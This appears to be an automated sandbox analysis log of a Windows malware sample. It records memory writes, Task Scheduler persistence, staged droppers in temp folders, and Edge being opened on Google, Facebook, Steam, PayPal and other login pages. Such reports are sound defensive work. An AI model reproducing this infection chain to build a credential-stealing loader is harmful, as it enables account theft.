PID 4464 wrote to memory of 2192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4464 wrote to memory of 2192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4464 wrote to memory of 2192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4464 wrote to memory of 2192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4464 wrote to memory of 2192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4464 wrote to memory of 2192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4464 wrote to memory of 2192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.1b4a83871dc67d0711f31b40a38c517524d6e481c997772a9eac7f2e240d8cba.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.1b4a83871dc67d0711f31b40a38c517524d6e481c997772a9eac7f2e240d8cba.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\eE3ax78.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\eE3ax78.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rz8Kg03.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rz8Kg03.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QX18Tq3.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QX18Tq3.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,14799011474375347612,9849399976232984361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,14799011474375347612,9849399976232984361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,7264660374504433744,16060194822495270117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,7264660374504433744,16060194822495270117,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,1229332725182430159,11784382996991836589,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,15914081744027535174,8490286588322735049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc39d046f8,0x7ffc39d04708,0x7ffc39d04718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4388 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pc6273.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pc6273.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3sV86Xd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3sV86Xd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5192 -ip 5192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8112 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Mc7LL94.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Mc7LL94.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9164 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9164 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8060 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\76A2.exe

C:\Users\Admin\AppData\Local\Temp\76A2.exe

C:\Users\Admin\AppData\Local\Temp\77AD.exe

C:\Users\Admin\AppData\Local\Temp\77AD.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3412 -ip 3412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 784

C:\Users\Admin\AppData\Local\Temp\8ED0.exe

C:\Users\Admin\AppData\Local\Temp\8ED0.exe

C:\Users\Admin\AppData\Local\Temp\919F.exe

C:\Users\Admin\AppData\Local\Temp\919F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\948E.exe

C:\Users\Admin\AppData\Local\Temp\948E.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\919F.exe

C:\Users\Admin\AppData\Local\Temp\919F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

